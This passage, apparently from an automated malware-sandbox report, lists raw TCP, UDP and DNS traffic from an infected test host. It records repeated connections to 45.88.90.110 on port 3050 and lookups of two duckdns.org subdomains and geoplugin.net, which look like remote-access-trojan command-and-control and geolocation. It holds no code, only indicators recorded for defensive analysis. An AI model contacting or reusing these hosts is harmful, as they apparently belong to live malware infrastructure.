                                                                                                              May 2, 2024 01:15:04.226193905 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.226217985 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.226247072 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.226286888 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.226330996 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.226349115 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.226385117 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.226424932 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.226438046 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.226449966 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.226461887 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.226469040 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.226496935 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.226582050 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.226596117 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.226630926 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.381385088 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381414890 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381431103 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381448984 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381467104 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381484032 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381501913 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381567955 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381584883 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381597042 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.381597996 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.381608963 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381628036 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381632090 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.381644964 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.381685972 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381711006 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381725073 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.381728888 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381766081 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.381804943 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381820917 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381838083 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381855011 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381858110 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.381872892 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381890059 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381897926 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.381907940 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381923914 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.381925106 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.381963968 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.381998062 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382014990 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382031918 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382056952 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.382074118 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382091045 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382107019 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382113934 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.382152081 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.382174015 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382191896 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382209063 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382225037 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.382261038 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382299900 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382302046 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.382340908 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382358074 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382379055 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.382416010 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382452965 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.382476091 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382493973 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382524967 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382529974 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.382586956 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.382628918 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383030891 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383049011 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383065939 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383083105 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383085966 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383100033 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383116007 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383126974 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383133888 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383152008 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383161068 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383169889 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383187056 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383193016 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383203030 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383219004 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383223057 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383238077 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383254051 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383259058 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383270979 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383286953 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383286953 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383306026 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383322954 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383327007 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383346081 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383362055 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383363008 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383380890 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383397102 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383402109 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383414984 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383436918 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383455992 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383472919 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383493900 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383500099 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383532047 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383538961 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383549929 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383584976 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383631945 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383703947 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383733988 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383738995 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383794069 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383810997 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383831024 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383842945 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383879900 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383884907 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383903027 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383940935 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.383981943 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.383997917 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384015083 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384031057 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384033918 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384049892 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384069920 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384097099 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384120941 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384139061 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384143114 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384155989 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384172916 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384179115 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384190083 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384206057 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384207010 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384224892 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384241104 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384244919 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384258032 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384278059 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384305954 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384336948 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384341002 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384382010 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384418964 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384438992 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384525061 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384541988 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384558916 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384563923 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384577036 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384593964 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384596109 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384625912 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384629965 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384643078 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384677887 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384744883 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384762049 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384778023 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384793043 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384797096 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384809971 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384826899 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384831905 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384844065 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384860992 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384865046 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384880066 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384896994 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384898901 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384916067 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384939909 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.384960890 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384979010 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.384999037 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.385018110 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385050058 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385056973 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.385106087 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385143042 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.385173082 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385215998 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385234118 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385257006 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.385301113 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385317087 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385333061 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385339975 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.385350943 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385366917 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385369062 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.385384083 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385400057 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385406017 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.385417938 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385433912 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385441065 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.385466099 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385476112 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.385483980 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385499954 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.385520935 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.477674961 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:04.536547899 CEST8049733178.237.33.50192.168.2.5
                                                                                                              May 2, 2024 01:15:04.536720991 CEST4973380192.168.2.5178.237.33.50
                                                                                                              May 2, 2024 01:15:04.699934959 CEST30504973145.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:04.774420977 CEST497313050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:05.945188999 CEST497313050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:06.154584885 CEST30504973145.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:06.538053036 CEST49734443192.168.2.520.12.23.50
                                                                                                              May 2, 2024 01:15:06.538103104 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:06.538165092 CEST49734443192.168.2.520.12.23.50
                                                                                                              May 2, 2024 01:15:06.538608074 CEST49734443192.168.2.520.12.23.50
                                                                                                              May 2, 2024 01:15:06.538620949 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:06.843597889 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:06.843699932 CEST49734443192.168.2.520.12.23.50
                                                                                                              May 2, 2024 01:15:06.873369932 CEST49734443192.168.2.520.12.23.50
                                                                                                              May 2, 2024 01:15:06.873398066 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:06.873805046 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:06.897181988 CEST49734443192.168.2.520.12.23.50
                                                                                                              May 2, 2024 01:15:06.940113068 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:07.137552023 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:07.137579918 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:07.137607098 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:07.137634039 CEST49734443192.168.2.520.12.23.50
                                                                                                              May 2, 2024 01:15:07.137648106 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:07.137675047 CEST49734443192.168.2.520.12.23.50
                                                                                                              May 2, 2024 01:15:07.137696981 CEST49734443192.168.2.520.12.23.50
                                                                                                              May 2, 2024 01:15:07.137810946 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:07.137850046 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:07.137861967 CEST49734443192.168.2.520.12.23.50
                                                                                                              May 2, 2024 01:15:07.137871027 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:07.137902021 CEST49734443192.168.2.520.12.23.50
                                                                                                              May 2, 2024 01:15:07.137939930 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:07.137978077 CEST49734443192.168.2.520.12.23.50
                                                                                                              May 2, 2024 01:15:07.153860092 CEST49734443192.168.2.520.12.23.50
                                                                                                              May 2, 2024 01:15:07.153877020 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:07.153907061 CEST49734443192.168.2.520.12.23.50
                                                                                                              May 2, 2024 01:15:07.153915882 CEST4434973420.12.23.50192.168.2.5
                                                                                                              May 2, 2024 01:15:10.282748938 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:10.441931009 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:10.441971064 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:10.441998959 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:10.442045927 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:10.442082882 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:10.442250967 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:10.442440987 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:10.600939035 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:10.600955009 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:10.603872061 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:10.603936911 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:10.852859020 CEST497323050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:11.022912025 CEST30504973245.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:20.996442080 CEST49736443192.168.2.5142.250.80.100
                                                                                                              May 2, 2024 01:15:20.996469021 CEST44349736142.250.80.100192.168.2.5
                                                                                                              May 2, 2024 01:15:20.996537924 CEST49736443192.168.2.5142.250.80.100
                                                                                                              May 2, 2024 01:15:20.996893883 CEST49736443192.168.2.5142.250.80.100
                                                                                                              May 2, 2024 01:15:20.996906042 CEST44349736142.250.80.100192.168.2.5
                                                                                                              May 2, 2024 01:15:21.181824923 CEST44349736142.250.80.100192.168.2.5
                                                                                                              May 2, 2024 01:15:21.185399055 CEST49736443192.168.2.5142.250.80.100
                                                                                                              May 2, 2024 01:15:21.185410976 CEST44349736142.250.80.100192.168.2.5
                                                                                                              May 2, 2024 01:15:21.185743093 CEST44349736142.250.80.100192.168.2.5
                                                                                                              May 2, 2024 01:15:21.187783957 CEST49736443192.168.2.5142.250.80.100
                                                                                                              May 2, 2024 01:15:21.187848091 CEST44349736142.250.80.100192.168.2.5
                                                                                                              May 2, 2024 01:15:21.337569952 CEST49736443192.168.2.5142.250.80.100
                                                                                                              May 2, 2024 01:15:31.177850008 CEST44349736142.250.80.100192.168.2.5
                                                                                                              May 2, 2024 01:15:31.177913904 CEST44349736142.250.80.100192.168.2.5
                                                                                                              May 2, 2024 01:15:31.178010941 CEST49736443192.168.2.5142.250.80.100
                                                                                                              May 2, 2024 01:15:31.502643108 CEST49736443192.168.2.5142.250.80.100
                                                                                                              May 2, 2024 01:15:31.502665997 CEST44349736142.250.80.100192.168.2.5
                                                                                                              May 2, 2024 01:15:33.474858046 CEST804972887.121.105.163192.168.2.5
                                                                                                              May 2, 2024 01:15:34.720923901 CEST30504973145.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:15:34.722606897 CEST497313050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:15:34.935795069 CEST30504973145.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:16:04.733675957 CEST30504973145.88.90.110192.168.2.5
                                                                                                              May 2, 2024 01:16:04.737004042 CEST497313050192.168.2.545.88.90.110
                                                                                                              May 2, 2024 01:16:04.951245070 CEST30504973145.88.90.110192.168.2.5

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              May 2, 2024 01:14:16.449434996 CEST5704353192.168.2.51.1.1.1
                                                                                                              May 2, 2024 01:14:16.449565887 CEST5155953192.168.2.51.1.1.1
                                                                                                              May 2, 2024 01:14:16.533828974 CEST53544631.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:14:16.537513971 CEST53570431.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:14:16.537802935 CEST53515591.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:14:16.538515091 CEST53551751.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:14:21.085643053 CEST53515111.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:14:22.338829041 CEST53622391.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:14:41.009613037 CEST53552401.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:14:59.997941971 CEST5382553192.168.2.51.1.1.1
                                                                                                              May 2, 2024 01:15:00.042428017 CEST53512621.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:15:00.103951931 CEST53538251.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:15:02.493674040 CEST5822953192.168.2.51.1.1.1
                                                                                                              May 2, 2024 01:15:02.597037077 CEST53582291.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:15:03.106193066 CEST5830553192.168.2.51.1.1.1
                                                                                                              May 2, 2024 01:15:03.196261883 CEST53583051.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:15:15.510016918 CEST53624601.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:15:15.996036053 CEST5049653192.168.2.51.1.1.1
                                                                                                              May 2, 2024 01:15:16.085412025 CEST53504961.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:15:23.929805040 CEST53502741.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:15:44.200479984 CEST53588671.1.1.1192.168.2.5
                                                                                                              May 2, 2024 01:16:00.040849924 CEST6108053192.168.2.51.1.1.1
                                                                                                              May 2, 2024 01:16:00.130646944 CEST53610801.1.1.1192.168.2.5

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              May 2, 2024 01:14:16.449434996 CEST192.168.2.51.1.1.10xa97aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                              May 2, 2024 01:14:16.449565887 CEST192.168.2.51.1.1.10x6e50Standard query (0)www.google.com65IN (0x0001)false
                                                                                                              May 2, 2024 01:14:59.997941971 CEST192.168.2.51.1.1.10x5765Standard query (0)jgbours284hawara01.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                              May 2, 2024 01:15:02.493674040 CEST192.168.2.51.1.1.10x7abfStandard query (0)jgbours284hawara02.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                              May 2, 2024 01:15:03.106193066 CEST192.168.2.51.1.1.10xfc96Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                              May 2, 2024 01:15:15.996036053 CEST192.168.2.51.1.1.10x76ceStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                              May 2, 2024 01:16:00.040849924 CEST192.168.2.51.1.1.10xa879Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
